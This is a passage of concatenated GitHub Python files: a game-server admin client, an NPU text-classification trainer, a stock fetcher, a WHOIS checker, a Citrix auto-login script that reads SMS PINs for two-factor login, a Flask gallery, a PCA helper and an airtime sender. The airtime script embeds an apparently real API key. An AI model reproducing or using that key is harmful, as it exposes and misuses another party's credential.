self.s.auth=(un,pw)\n \n def post_cmd(self,*args):\n try:\n return self.s.post(\n 'http://'+self.servervar.get()+':7654/cardinal',\n data={\n 'cmd': ' '.join(args)\n }\n ).text\n except Exception as e:\n return '%s %s'%(type(e),e)\n\n def run(self,cmd1,cmd2):\n if cmd1=='player' or (cmd1=='ban' and cmd2!='clear') or cmd1=='set':\n another=self.dialog.askstring('MHCP001','%s %s'%(cmd1,cmd2))\n if another is not None:\n return self.post_cmd(cmd1,cmd2,another)\n else:\n return '(canceled)'\n else:\n return self.post_cmd(cmd1,cmd2)\n\n def runner(self,cmd1,cmd2):\n return lambda: self.resultvar.set(self.run(cmd1,cmd2))\n\n def submit_eval(self):\n arg=self.evalvar.get()\n self.evaltext.insert('end','>>> ','prompt')\n self.evaltext.insert('end',arg+'\\n','input')\n self.evaltext.insert('end',self.post_cmd('eval',arg)+'\\n')\n self.evaltext.see('end')","repo_name":"xmcp/cer","sub_path":"cerutils/mhcp.py","file_name":"mhcp.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"72867110302","text":"import time\nimport torch\nimport numpy as np\nfrom train_eval import train, init_network\nfrom importlib import import_module\nimport argparse\nimport torch.distributed as dist\nimport os\nfrom apex import amp\nimport apex\n\nif torch.__version__ >= '1.8':\n import torch_npu\n \nparser = argparse.ArgumentParser(description='Chinese Text Classification')\nparser.add_argument('--model', type=str, required=True, help='choose a model: TextCNN, TextRNN, FastText, TextRCNN, TextRNN_Att, DPCNN, Transformer')\nparser.add_argument('--embedding', default='pre_trained', type=str, help='random or pre_trained')\nparser.add_argument('--word', default=False, type=bool, help='True for word, False for char')\n# DDP argument.\nparser.add_argument('--dist_backend', default='hccl', type=str, help='hccl for npu, must!')\nparser.add_argument('--world_size', default=1, type=int, help='ddp world size')\nparser.add_argument('--local_rank', default=0, type=int, help='local rank')\nparser.add_argument('--num_epochs', default=20, type=int, help='number of train epoch')\nparser.add_argument('--distributed', action=\"store_true\", help='distributed')\nparser.add_argument('--data_path', default='THUCNews', type=str, help='data path')\nargs = parser.parse_args()\n\n\ndef main():\n dataset = args.data_path # 数据集\n print(\"args.world_size = \", args.world_size)\n print(\"args.addr = \", os.environ[\"MASTER_ADDR\"])\n print(\"args.Port = \", os.environ[\"MASTER_PORT\"])\n args.rank = 0\n\n if args.distributed:\n args.device = 'npu:%d' % args.local_rank\n torch.npu.set_device(args.device)\n dist.init_process_group(backend=args.dist_backend, world_size=args.world_size, rank=args.local_rank)\n args.world_size = int(os.environ['WORLD_SIZE'])\n args.rank = torch.distributed.get_rank()\n\n else:\n args.device = f'npu:{args.local_rank}'\n torch.npu.set_device(args.device)\n\n print('local_rank {}'.format(args.local_rank))\n\n # 搜狗新闻:embedding_SougouNews.npz, 腾讯:embedding_Tencent.npz, 随机初始化:random\n embedding = 'embedding_SougouNews.npz'\n if args.embedding == 'random':\n embedding = 'random'\n model_name = args.model # 'TextRCNN' # TextCNN, TextRNN, FastText, TextRCNN, TextRNN_Att, DPCNN, Transformer\n if model_name == 'FastText':\n from utils_fasttext import build_dataset, build_iterator, get_time_dif\n embedding = 'random'\n else:\n from utils import build_dataset, build_iterator, get_time_dif\n\n x = import_module('models.' 
+ model_name)\n config = x.Config(dataset, embedding)\n\n config.device = args.device\n config.world_size = args.world_size\n config.local_rank = args.local_rank\n config.batch_size = config.batch_size * config.world_size\n config.distributed = args.distributed\n config.num_epochs = args.num_epochs\n\n np.random.seed(666)\n torch.manual_seed(666)\n torch.npu.manual_seed_all(666)\n torch.backends.cudnn.deterministic = True # 保证每次结果一样\n\n start_time = time.time()\n print(\"Loading data...\")\n vocab, train_data, dev_data, test_data = build_dataset(config, args.word)\n train_iter = build_iterator(train_data, config)\n dev_iter = build_iterator(dev_data, config)\n test_iter = build_iterator(test_data, config)\n time_dif = get_time_dif(start_time)\n print(\"Time usage:\", time_dif)\n\n # train\n config.n_vocab = len(vocab)\n model = x.Model(config).to(config.device)\n\n optimizer = apex.optimizers.NpuFusedAdam(model.parameters(), lr=config.learning_rate)\n\n model, optimizer = amp.initialize(model, optimizer, opt_level='O2', loss_scale=\"dynamic\", combine_grad=True,master_weights=True)\n \n\n if config.distributed:\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.local_rank], broadcast_buffers=False) \n if model_name != 'Transformer':\n init_network(model)\n print(model.parameters)\n train(config, model, train_iter, dev_iter, test_iter, optimizer)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/contrib/nlp/TextCNN/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"9509009252","text":"import pandas as pd\nimport requests\nimport matplotlib.pyplot as plt\n\n# Define the stock symbols to fetch data for\nstock_list = ['SBIN', 'ASIANPAINT', 'AXISBANK']\n\n# Define the URL to fetch stock data from\nurl = f'https://api.nsepy.xyz/api/get_history?symbol={{}}&series=EQ&from=2015-01-01&to=2015-01-09'\n\n# Fetch data for each stock and combine into a single DataFrame\ndf_list = []\nfor stock in stock_list:\n response = requests.get(url.format(stock))\n data = response.json()['data']\n df = pd.DataFrame(data)\n df = df[['Date', 'Close']]\n df.rename(columns={'Close': f'{stock}_close'}, inplace=True)\n df_list.append(df)\ntable_value = pd.concat(df_list, axis=1)\n\n# Plot the stock data\ntable_value.set_index('Date').plot()\nplt.show()\n","repo_name":"mushirmansoori/Assignments","sub_path":"Quest1.py","file_name":"Quest1.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26218858803","text":"#!/usr/bin/env python\nfrom time import sleep\nimport sys\ntry:\n\timport whois\nexcept ImportError:\n\tprint(\"ERROR: This script requires the python-whois module to run.\")\n\tprint(\" You can install it via 'pip install python-whois'\")\n\tsys.exit(0)\n\n# Change top-level domain to check here\nTLD = '.com'\n\n# 1. Get prefixes and suffixes from input.txt\nsuffixes = []\nprefixes = []\nreadingPrefixes = False\nf = open('input.txt')\nfor l in f:\n\tline = l.strip()\n\tif line == '--prefixes':\n\t\treadingPrefixes = True\n\t\tcontinue\n\telif line == '--suffixes':\n\t\treadingPrefixes = False\n\t\tcontinue\n\telif not line:\n\t\tcontinue # Ignore empty lines\n\tif readingPrefixes:\n\t\tprefixes.append(line)\n\telse:\n\t\tsuffixes.append(line)\nf.close()\n\n# 2. 
create list of domains from prefixes and suffixes\ndomains\t=[]\nfor pre in prefixes:\n\tfor suff in suffixes:\n\t\tdomains.append( pre + suff + TLD)\n\n# 3. Get list of domains that have aleady found to be free and removed them\ncheckeddomains= [line.strip() for line in open('free-domains.txt')] # Strip out newlines too\nfor remove in checkeddomains:\n\ttry:\n\t\tdomains.remove(remove)\n\texcept ValueError:\n\t\tpass # Ignore exceptions\n\n# 4. Check list of domains and write to file\nfor domain in domains:\n\tsleep(0.5) # Too many requests lead to incorrect responses\n\tprint(' Checking: ' + domain), # Comma means no newline is printed\n\ttry:\n\t\tw = whois.whois(domain)\n\t\tprint('\\tTAKEN')\n\texcept whois.parser.PywhoisError:\n\t\t# Exception means that the domain is free\n\t\tprint('\\tFREE')\n\t\tf = open('free-domains.txt', 'a')\n\t\tf.write(domain + '\\n')\n\t\tf.close()\nprint(\"DONE!\")\n","repo_name":"caspii/domainfinder","sub_path":"find.py","file_name":"find.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"} +{"seq_id":"29916543616","text":"import configparser\nimport datetime\nimport os\nimport logging\nimport logging.config\nimport stat\nimport web_ops\nimport message_ops\nimport mouse_work\n\n\ndef main():\n \"\"\"\n Основная логика\n :return:\n \"\"\"\n\n citrix_adr = config.get('CITRIX', 'address')\n logging.info('Этап: Запуск Firefox и Переход по ссылке CITRIX \"{}\"'.format(citrix_adr))\n ctx = web_ops.open_citrix(citrix_adr)\n stage_result()\n\n logging.info('Этап: Авторизация')\n citrix_login = config.get('CITRIX_AUTH', 'login')\n citrix_pass = config.get('CITRIX_AUTH', 'password')\n citrix_keyword = config.get('CITRIX_AUTH', 'key_word')\n if web_ops.login_citrix(ctx, citrix_login, citrix_pass, citrix_keyword):\n stage_result()\n else:\n stage_result(False)\n exit()\n logging.info('Этап: Поиск пин-кода для CITRIX')\n now = datetime.datetime.now()\n current_datetime = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n msg_db = config.get('MSG_DB', 'file')\n ctx_number = config.get('CITRIX', 'mobile_number')\n code = message_ops.citrix_pin(msg_db, ctx_number, current_datetime)\n logging.debug('Получен пин-код от Citrix: {}'.format(code))\n logging.info('Этап: Ввод пин-кода')\n if web_ops.inter_pincode(ctx, code):\n stage_result()\n else:\n stage_result(False)\n exit()\n logging.info('Этап: Имитация мыши, подключение к VDI')\n mouse_work.drill_to_reciever()\n stage_result()\n\n\ndef set_logging():\n \"\"\"\n Настройка логирования\n :return:\n \"\"\"\n log_dir = 'logs'\n log = 'connect.log'\n logfile_name = log_dir + '/' + log\n\n # Проверка на существование папки для логов\n if log_dir not in os.listdir(script_home):\n os.makedirs(log_dir, 0o777)\n\n if log not in os.listdir(log_dir):\n open(logfile_name, 'w').close()\n os.chmod(logfile_name, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)\n\n\ndef stage_result(flag=True):\n \"\"\"\n Логирование результата этапа\n :param flag: Флаг выполнения\n :return: None\n \"\"\"\n if flag:\n logging.info('Готово!')\n else:\n logging.error('Ошибка')\n\n\nif __name__ == '__main__':\n # Расположение Кода\n script_home = os.path.dirname(os.path.abspath(__file__))\n script_home = script_home + '/../'\n os.chdir(script_home)\n\n set_logging()\n logging.config.fileConfig('conf/logging.conf')\n\n logging.info('Выполнен запуск')\n\n # Загрузка конфигурации\n config = configparser.ConfigParser()\n config.read('conf/configuration.ini')\n\n # Запуск основной логики\n 
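# run the main logic; the try/finally below is currently a no-op wrapper around main()\n    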
try:\n main()\n finally:\n pass\n","repo_name":"elMariachi23/CITRIX_AUTO_CONNECT","sub_path":"bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2721146647","text":"import sys\nfrom ui.DemoWindow import *\nfrom ui.StatsWindow import *\n\n\ndef launch_ui(titles):\n app = QtWidgets.QApplication([])\n main = MainWindow(titles)\n main.show()\n sys.exit(app.exec_())\n\n\nclass MainWindow(QtWidgets.QWidget):\n def __init__(self, titles):\n super().__init__()\n self.__titles = titles\n\n self.__title = QtWidgets.QLabel(\"Pop Daniel Avram - B.Sc. Thesis Demo\",\n alignment=QtCore.Qt.AlignCenter)\n self.__demo_button = QtWidgets.QPushButton(\"Demo\")\n self.__demo_button.clicked.connect(self.__launch_demo_window)\n\n self.__stats_button = QtWidgets.QPushButton(\"Stats\")\n self.__stats_button.clicked.connect(self.__launch_stats_window)\n\n self.layout = QtWidgets.QVBoxLayout(self)\n self.layout.addWidget(self.__title)\n self.layout.addWidget(self.__demo_button)\n self.layout.addWidget(self.__stats_button)\n\n self.__demo_window = DemoWindow(self.__titles)\n self.__stats_window = StatsWindow()\n\n @QtCore.Slot()\n def __launch_demo_window(self):\n self.__demo_window.resize(800, 600)\n self.__demo_window.show()\n\n @QtCore.Slot()\n def __launch_stats_window(self):\n self.__stats_window.resize(800, 600)\n self.__stats_window.show()\n","repo_name":"AvramPop/bachelor-thesis","sub_path":"thesis-project/ui/ui_main.py","file_name":"ui_main.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19712219693","text":"def main_logic():\r\n global shield_range\r\n laser_group.draw(screen)\r\n laser_group.update()\r\n\r\n # giant group of meteors. 
groups useful for displaying single/multiple sprites on screen\r\n meteor_group.draw(screen)\r\n meteor_group.update() # .update method is from the class so that the position of the sprite change\r\n\r\n spaceship_group.draw(screen) # contains only 1 sprite that's why used GroupSingle\r\n spaceship_group.update()\r\n\r\n # meteor_group.draw(screen)\r\n # meteor_group.update()\r\n\r\n # Collisions\r\n if pygame.sprite.spritecollide(spaceship_group.sprite, meteor_group, True):\r\n mixer.music.load('Goat Scream.mp3')\r\n mixer.music.play(1)\r\n shield_range -= 1\r\n\r\n for beams in laser_group:\r\n if pygame.sprite.spritecollide(beams, meteor_group, True):\r\n beams.kill()","repo_name":"Ali-TM-original/Meteor-game","sub_path":"main_running_function.py","file_name":"main_running_function.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74655665821","text":"import os, sys, logging, warnings, secrets\nfrom IPython.display import display\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.preprocessing import *\nfrom sklearn.decomposition import *\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.express as px\n\n\nfrom sklearn.impute import KNNImputer\n\n\nclass Pca:\n \"\"\"attrs :\n\n X : original X\n X_scaled : standardscale of X\n pca : pca instance\n pcs : components\n variance : vairaince and cumvariance of pcs\n\n \"\"\"\n\n def __init__(\n self,\n _df,\n n_components: int = None,\n id_col=None,\n kernel=False,\n force_nan_impute=True,\n ) -> None:\n \"\"\" \"\"\"\n\n # X\n self.X = _df.copy()\n\n # display(_df)\n\n self.id_column = self.X.loc[:, id_col].values if id_col else self.X.index.values\n X_num = self.X.select_dtypes(include=np.number).copy()\n\n if force_nan_impute:\n X_num = pd.DataFrame(\n KNNImputer().fit_transform(X_num), columns=X_num.columns\n )\n\n self.kernel = kernel\n\n self.n_components = n_components if n_components else X_num.shape[1]\n\n # X_scaled\n X_scaled = pd.DataFrame(\n StandardScaler().fit_transform(X_num), columns=X_num.columns\n )\n self.X_scaled = X_scaled\n\n if not kernel:\n pca = PCA(n_components=self.n_components)\n else:\n pca = KernelPCA(\n n_components=self.n_components, kernel=self.kernel, gamma=10\n )\n\n self.pca = pca\n self.pca.fit(X_scaled)\n\n @property\n def _variance(self):\n # variance :\n variance = self.pca.explained_variance_ratio_\n variance_cum = np.cumsum(self.pca.explained_variance_ratio_)\n\n _variance = pd.DataFrame(\n {\"variance\": variance, \"variance_cum\": variance_cum},\n index=[f\"PC_{i+1}\" for i, _ in enumerate(self.X_proj.columns)],\n )\n\n return _variance.round(2)\n\n @property\n def _pcs(self):\n # pcs\n _pcs = self.pca.components_\n _pcs = pd.DataFrame(\n _pcs, index=self.X_proj.columns, columns=self.X_scaled.columns\n )\n _pcs = _pcs.round(2)\n\n return _pcs\n\n @property\n def X_proj(self):\n X_proj = self.pca.transform(self.X_scaled)\n X_proj = pd.DataFrame(X_proj)\n X_proj.columns = [f\"PC_{i+1}\" for i, _ in enumerate(X_proj.columns)]\n\n return X_proj\n\n def variance(self, display_=True):\n \"\"\" \"\"\"\n\n # TODO USE PLOTLY\n\n # compute\n scree = (self.pca.explained_variance_ratio_ * 100).round(2)\n scree_cum = scree.cumsum().round()\n x_list = range(1, self.n_components + 1)\n\n # display\n if display_:\n plt.bar(x_list, scree)\n plt.plot(x_list, scree_cum, c=\"red\", marker=\"o\")\n plt.xlabel(\"rang de l'axe d'inertie\")\n plt.ylabel(\"pourcentage d'inertie\")\n 
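# scree plot: each bar is one component's share of variance, the red line is the cumulative share\n            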
plt.title(\"Eboulis des valeurs propres\")\n plt.show(block=False)\n\n return self._variance\n\n def pcs(self, fmt: int = 2, size=8, display_: bool = True):\n \"\"\" \"\"\"\n\n # TODO update with plotly\n # no attribute => Function\n # args,\n\n if display_:\n figsize = [int(1.5 * size), size]\n fmt = f\".{fmt}f\"\n fig, ax = plt.subplots(1, 1, figsize=figsize)\n ax = sns.heatmap(\n self._pcs.T, vmin=-1, vmax=1, cmap=\"coolwarm\", fmt=fmt, annot=True\n )\n # fig.show()\n\n return self._pcs.T\n\n def correlation_graph(\n self,\n dim: list = [0, 1],\n ):\n \"\"\"Affiche le graphe des correlations\n\n Positional arguments :\n -----------------------------------\n dim : list ou tuple : le couple x,y des plans à afficher, exemple [0,1] pour F1, F2\n \"\"\"\n\n # TODO ==> USE PX and NOT MATPLOTLIB\n\n # Extrait x et y\n x, y = dim\n\n # features\n features = self.X_scaled.columns\n\n # Taille de l'image (en inches)\n fig, ax = plt.subplots(figsize=(10, 9))\n\n # Pour chaque composante :\n for i in range(0, self.pca.components_.shape[1]):\n # Les flèches\n ax.arrow(\n 0,\n 0,\n self.pca.components_[x, i],\n self.pca.components_[y, i],\n head_width=0.07,\n head_length=0.07,\n width=0.02,\n )\n\n # Les labels\n plt.text(\n self.pca.components_[x, i] + 0.05,\n self.pca.components_[y, i] + 0.05,\n features[i],\n )\n\n # Affichage des lignes horizontales et verticales\n plt.plot([-1, 1], [0, 0], color=\"grey\", ls=\"--\")\n plt.plot([0, 0], [-1, 1], color=\"grey\", ls=\"--\")\n\n # Nom des axes, avec le pourcentage d'inertie expliqué\n plt.xlabel(\n \"F{} ({}%)\".format(\n x + 1, round(100 * self.pca.explained_variance_ratio_[x], 1)\n )\n )\n plt.ylabel(\n \"F{} ({}%)\".format(\n y + 1, round(100 * self.pca.explained_variance_ratio_[y], 1)\n )\n )\n\n # J'ai copié collé le code sans le lire\n plt.title(\"Cercle des corrélations (F{} et F{})\".format(x + 1, y + 1))\n\n # Le cercle\n an = np.linspace(0, 2 * np.pi, 100)\n plt.plot(np.cos(an), np.sin(an)) # Add a unit circle for scale\n\n # Axes et display\n plt.axis(\"equal\")\n plt.show(block=False)\n\n def _2d_factorial_planes(\n self,\n X_,\n dim,\n labels,\n clusters,\n alpha,\n figsize,\n marker,\n ):\n # TODO USE PX\n\n x, y = dim\n\n # Initialisation de la figure\n fig, ax = plt.subplots(1, 1, figsize=figsize)\n\n if len(clusters):\n sns.scatterplot(data=None, x=X_[:, x], y=X_[:, y], hue=clusters)\n else:\n sns.scatterplot(data=None, x=X_[:, x], y=X_[:, y])\n\n # Si la variable pca a été fournie, on peut calculer le % de variance de chaque axe\n v1 = str(round(100 * self.pca.explained_variance_ratio_[x])) + \" %\"\n v2 = str(round(100 * self.pca.explained_variance_ratio_[y])) + \" %\"\n\n # Nom des axes, avec le pourcentage d'inertie expliqué\n ax.set_xlabel(f\"F{x+1} {v1}\")\n ax.set_ylabel(f\"F{y+1} {v2}\")\n\n # Valeur x max et y max\n x_max = np.abs(X_[:, x]).max() * 1.1\n y_max = np.abs(X_[:, y]).max() * 1.1\n\n # On borne x et y\n ax.set_xlim(left=-x_max, right=x_max)\n ax.set_ylim(bottom=-y_max, top=y_max)\n\n # Affichage des lignes horizontales et verticales\n plt.plot([-x_max, x_max], [0, 0], color=\"grey\", alpha=0.8)\n plt.plot([0, 0], [-y_max, y_max], color=\"grey\", alpha=0.8)\n\n # Affichage des labels des points\n if len(labels):\n # j'ai copié collé la fonction sans la lire\n for i, (_x, _y) in enumerate(X_[:, [x, y]]):\n plt.text(\n _x, _y + 0.05, labels[i], fontsize=\"14\", ha=\"center\", va=\"center\"\n )\n\n # Titre et display\n plt.title(f\"Projection des individus (sur F{x+1} et F{y+1})\")\n plt.show()\n\n def 
_3d_factorial_planes(\n self,\n X_,\n dim,\n labels,\n clusters,\n alpha,\n figsize,\n marker,\n ):\n \"\"\" \"\"\"\n\n x, y, z = dim\n\n # TOD ADD LABELS AS TEXT\n\n # axis name\n\n v1 = str(round(100 * self.pca.explained_variance_ratio_[x])) + \" %\"\n v2 = str(round(100 * self.pca.explained_variance_ratio_[y])) + \" %\"\n v3 = str(round(100 * self.pca.explained_variance_ratio_[z])) + \" %\"\n vs = [v1, v2, v3]\n axis = [f\"PC_{i+1}\" for i in dim]\n axis = {k: v1 + \"_\" + v2 for k, v1, v2 in zip([\"x\", \"y\", \"z\"], axis, vs)}\n\n if len(clusters):\n # str for better viz\n if isinstance(clusters, pd.Series):\n clusters = clusters.values\n clusters = [str(i) for i in clusters]\n fig = px.scatter_3d(\n x=X_[:, x], y=X_[:, y], z=X_[:, z], color=clusters, labels=axis\n )\n else:\n fig = px.scatter_3d(x=X_[:, x], y=X_[:, y], z=X_[:, z], labels=axis)\n\n # marker size\n fig.update_traces(marker=dict(size=3), selector=dict(mode=\"markers\"))\n\n fig.show()\n\n def factorial_planes(\n self,\n dim: list = [0, 1],\n labels: str = None,\n clusters: str = None,\n alpha: float = 1,\n scale: bool = False,\n scaler: str = \"min\",\n figsize: list = [10, 8],\n marker: str = \".\",\n ):\n \"\"\"\n Affiche la projection des individus\n\n Positional arguments :\n -------------------------------------\n dim : list ou tuple : le couple x,y des plans à afficher, exemple [0,1] pour F1, F2\n\n Optional arguments :\n -------------------------------------\n labels : str, list/tuple : les labels des individus à projeter, default = None\n si str on va chercher la colonne du df, si list on ajoute ex nihilo\n clusters : list ou tuple : la liste des clusters auquel appartient chaque individu, default = None\n si str on va chercher la colonne du df, si list on ajoute ex nihilo\n alpha : float in [0,1] : paramètre de transparence, 0=100% transparent, 1=0% transparent, default = 1\n figsize : list ou tuple : couple width, height qui définit la taille de la figure en inches, default = [10,8]\n marker : str : le type de marker utilisé pour représenter les individus, points croix etc etc, default = \".\"\n \"\"\"\n\n # TODO USE PX\n\n # TO DO IMPLEMENT over scaling for better vise\n\n # Transforme self.X_proj en np.array\n X_ = np.array(self.X_proj)\n\n # On définit la forme de la figure si elle n'a pas été donnée\n if not figsize:\n figsize = (7, 6)\n\n # check LABELS\n\n types = (list, tuple, pd.Series, np.ndarray)\n if isinstance(labels, types): # np.ndarray\n if not len(labels) == len(X_):\n raise AttributeError(\n f\"labels len {len(labels)} and X len {len(self.X)} not len OK\"\n )\n elif labels in [None, \"\", 0, False, []]:\n labels = []\n elif isinstance(labels, str):\n if labels not in self.X.columns:\n raise AttributeError(f\"label {labels} not in X => {self.X.columns}\")\n labels = self.X.loc[:, labels].values\n\n # sanitary check\n try:\n len(labels)\n except Exception as e:\n logging.error(f\"len labels failed : {labels}\")\n raise e\n\n # check CLUSTERS\n\n if isinstance(clusters, types): # np.ndarray\n if not len(clusters) == len(X_):\n raise AttributeError(\n f\"clusters len {len(clusters)} and X len {len(self.X)} not len OK\"\n )\n elif clusters in [None, \"\", 0, False, []]:\n clusters = []\n elif isinstance(clusters, str):\n if clusters not in self.X.columns:\n raise AttributeError(f\"label {clusters} not in X => {self.X.columns}\")\n clusters = self.X.loc[:, clusters].values\n\n # sanitary check\n try:\n len(clusters)\n except Exception as e:\n logging.error(f\"len clusters failed : {clusters}\")\n 
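# re-raise so the caller still sees the original exception after it has been logged\n            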
raise e\n\n # axis 12321 is pb\n if max(dim) >= X_.shape[1]:\n raise AttributeError(\"la variable axis n'est pas bonne\")\n\n if len(dim) == 2:\n self._2d_factorial_planes(\n X_,\n dim,\n labels,\n clusters,\n alpha,\n figsize,\n marker,\n )\n\n if len(dim) == 3:\n self._3d_factorial_planes(\n X_,\n dim,\n labels,\n clusters,\n alpha,\n figsize,\n marker,\n )\n","repo_name":"AlexandreGazagnes/gargaml","sub_path":"gargaml/eda/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":12232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22995534075","text":"\"\"\"\r\nCho số nguyên dương N. Mỗi bước thực hiện các phép biến đổi N theo quy tắc sau\r\n\r\nNếu N chẵn thì N = N/2\r\nNếu N lẻ thì N = N*3 + 1\r\nHãy đếm xem có bao nhiêu giá trị xuất hiện cho đến khi N = 1. Tất nhiên nếu ban đầu N = 1 thì chỉ có một giá trị duy nhất.\r\n\r\nVí dụ: N = 3 thì sẽ có 8 giá trị xuất hiện lần lượt là: 3, 10, 5, 16, 8, 4, 2, 1\r\nInput kết thúc khi N = 0.\r\nInput:\r\n1\r\n2\r\n3\r\n0\r\nOutput:\r\n1\r\n2\r\n8\r\n\"\"\"\r\nif __name__ == \"__main__\":\r\n while 1:\r\n n=int(input())\r\n if n==0: break\r\n a=[n]\r\n while n>1:\r\n if n%2==0:\r\n n=int(n/2)\r\n a.append(n)\r\n else:\r\n n=n*3+1\r\n a.append(n)\r\n print(len(a))\r\n\r\n","repo_name":"vantuan0128/PYTHON_PTIT","sub_path":"PY02013.py","file_name":"PY02013.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"73879099104","text":"ENG_FRANCAIS = {\n \"Air Quality\": \"Qualité de l'air\",\n \"ALARM\": \"ALARME\",\n \"Alarm\": \"Alarme\",\n \"CALIBRATE\": \"ÉTALONNAGE\",\n \"DANGER\": \"DANGER\",\n \"ENGLISH\": \"FRANÇAIS\",\n \"GOOD\": \"BON\",\n \"HAZARDOUS\": \"RISQUÉ\",\n \"Indoor Air Quality\": \"Qualité de l'air intérieur\",\n \"INVALID\": \"INVALIDE\",\n \"LANGUAGE\": \"LANGUE\",\n \"LOW BATTERY\": \"BATTERIE FAIBLE\",\n \"MODERATE\": \"MODÉRÉ\",\n \"OVERRANGE\": \"MAXIMUM\",\n \"POOR\": \"PAUVRES\",\n \"SENSITIVE\": \"SENSIBLE\",\n \"TEMPERATURE\": \"TEMPÉRATURE\",\n \"UNHEALTHY\": \"MALSAIN\",\n \"V UNHEALTHY\": \"TRÈS MALSAIN\",\n \"WARMUP\": \"PRÉCHAUFFE\",\n \"WARNING\": \"ATTENTION\",\n}\n\n\ndef interpret(enable=True, english_phrase=\"\"):\n \"\"\"Translate an English phrase.\n\n :param bool enable: Enable the translator. Defaults to True.\n :param str english_phrase: English phrase to be interpreted. Defaults to blank.\n \"\"\"\n\n if enable:\n if english_phrase in ENG_FRANCAIS:\n return ENG_FRANCAIS[english_phrase]\n return english_phrase\n","repo_name":"CedarGroveStudios/CircuitPython_AirQualityTools","sub_path":"cedargrove_airqualitytools/translate/english_to_francais.py","file_name":"english_to_francais.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"16571593435","text":"from django.urls import include, path\nfrom . 
import views\n\nurlpatterns = [\n path('paths/', views.get_paths),\n path('thumbs/', views.get_thumbs),\n path('image//', views.get_image),\n path('image//next', views.get_next_image),\n path('image//previous', views.get_previous_image),\n path('import/', views.add_path),\n path('refresh/', views.refresh_all),\n path('path//refresh/', views.refresh_path),\n path('remove/', views.delete_all),\n path('path//remove', views.delete_path)\n]\n\n","repo_name":"alastairflynn/gallery","sub_path":"backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39916782704","text":"\nfrom __future__ import print_function\n\nimport africastalking\n\nclass AIRTIME:\n def __init__(self):\n\t\t\n self.username = \"Zaddyy\"\n self.api_key = \"7e62c3354e8c37df9cc21abb2fee96f5286d7d314cc244ad52c6e508068f1afa\"\n\n \n africastalking.initialize(self.username, self.api_key)\n\n \n self.airtime = africastalking.Airtime\n\n def send(self):\n \n phone_number = '+2348138054685'\n\n \n amount = \"100\"\n currency_code = \"NGN\"\n\n try:\n\t\t\t\n responses = self.airtime.send(phone_number=phone_number, amount=amount, currency_code=currency_code)\n print (responses)\n except Exception as e:\n print (\"Encountered an error while sending airtime:%s\" %str(e))\n\nif __name__ == '__main__':\n AIRTIME().send()","repo_name":"pelzfx/social-media-incentive-app","sub_path":"airtime.py","file_name":"airtime.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21535076527","text":"import os\nfrom flask import Flask, render_template, flash, request, redirect, url_for, send_from_directory, abort\nimport json\nimport glob\nimport re\n\napp = Flask(__name__)\nconf = {}\n\nfor filename in glob.glob('conf/*.json'):\n matches = re.findall('conf/(\\d\\d\\d\\d)\\.json', filename)\n if len(matches) > 0:\n year = matches[0]\n with open(filename) as f:\n conf[year] = json.load(f)\n\nphotos = []\nfor filename in glob.glob('photos/*.JPG'):\n photos.append(\"/\" + filename)\n\ndef valid_id(year, unique_id):\n if year in conf and unique_id in conf[year]:\n return True\n return False\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World! 
From luke.'\n\n@app.route('/reveal//')\ndef show_user_profile(year_raw, unique_id):\n year = str(year_raw)\n if valid_id(year, unique_id):\n return render_template('{}/reveal.html'.format(year), info=conf[year][unique_id], photos=photos)\n abort(404)\n #return redirect('/')\n\n@app.route('/static/')\ndef send_static(path):\n return send_from_directory('static', path)\n\n\n@app.route('/photos/')\ndef send_photos(path):\n return send_from_directory('photos', path)\n","repo_name":"youngjl1/santa_site","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"3994498437","text":"import pandas as pd\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# Read in the data as a pandas dataframe\ndef dataImport(filename):\n data = pd.read_excel(filename)\n return data\n\n\n# Normalise the data using a min-max normalisation method\ndef dataNormalisation(dataset):\n statusDropped = dataset.drop(['Status'], axis=1)\n normalised = (statusDropped - statusDropped.min()) / (statusDropped.max() - statusDropped.min())\n return normalised\n\n\n# Split and shuffle the data into x and y for training and testing\ndef dataPreprocessing(dataset):\n # Normalise the numerical data before training, removes the 'Status' column in 'dataNormalisation'\n 